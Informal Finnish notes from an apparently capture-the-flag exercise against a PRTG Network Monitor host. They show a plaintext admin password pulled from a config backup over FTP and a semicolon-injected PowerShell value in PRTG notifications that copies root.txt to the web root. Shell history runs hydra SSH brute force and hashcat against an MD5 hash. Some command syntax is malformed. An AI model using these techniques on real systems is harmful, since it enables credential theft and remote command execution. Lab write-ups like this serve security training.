etin saaaatanan pitkään FTP hidden filuja ja pääsin prtg useriin.
Löyty sivuston conf filuja ja old. bak ehkä crittas.
<DBCREDENTIALS>

lftp 10.10.10.152:/users/All users/Paessler/PRTG Network Monitor> cat "PRTG Configuration.old.bak" | grep -C 3 admin
              0                                              
            </dbcredentials>
            <dbpassword>
	      <!-- User: prtgadmin -->
	      PrTg@dmin2018
            </dbpassword>
            <dbtimeout>


Nykyvuoden password eli PrTg@admin2019 -> devices -> group root

säkäl vois toimii et saa tunnarin ssh

SSH EI TOIMI:

pitää mennä setup - notifications - sit pystyy runaa exe. sillä tehään ps
scripti.

scoudee admin root folderi -
 get-childitem -path c:\users\administrator\ |
 out-file -filepath c:\inetpub\output.txt vaikka

tän jälkeen pitäs saada joku kopiointiscript.

tabula rasa kopio: copy-item -path c:\administrator\root.txt c:\inetpub\123123.txt

katkase powershell scripti ";" ehkä asd.txt; <oma komento>


  120  ssh jsk@localhost
  121  ufw allow 22/tcp
  122  ssh jsk@localhost
  123  systemctl restart ssh.service
  124  ssh jsk@localhost
  125  ls
  126  cd list/
  127  ls
  128  nano pwlista
  129  ls
  130  hydra
  131  hostname -I
  137  man hydra
  138  hydra -l jsk -P pwlista 172.28.171.64 service ssh
  139  hydra -l jsk -P pwlista ssh://172.28.171.64

hydra ssh login user = juska, manual pwlista, ip

   22  echo "admin" | md5sum
   23  hashcat -m 0 -a 3 456b7016a916a4b178dd72b947c152b7 --force
   24  ls


    Directory: C:\users\administrator


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---         2/3/2019   7:08 AM                Contacts                      
d-r---         2/2/2019  11:35 PM                Desktop                       
d-r---         2/3/2019   7:08 AM                Documents                     
d-r---         2/3/2019   7:08 AM                Downloads                     
d-r---         2/3/2019   7:08 AM                Favorites                     
d-r---         2/3/2019   7:08 AM                Links                         
d-r---         2/3/2019   7:08 AM                Music                         
d-r---         2/3/2019   7:08 AM                Pictures                      
d-r---         2/3/2019   7:08 AM                Saved Games                   
d-r---         2/3/2019   7:08 AM                Searches                      
d-r---        2/25/2019  10:06 PM                Videos                        



    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----         2/2/2019  11:35 PM             33 root.txt                      

##oikee syntaksi
asd.txt; copy-item -file c:\administrator\Desktop\root.txt | -Destination  c:\users\inetpub\123123.txt -Recurse

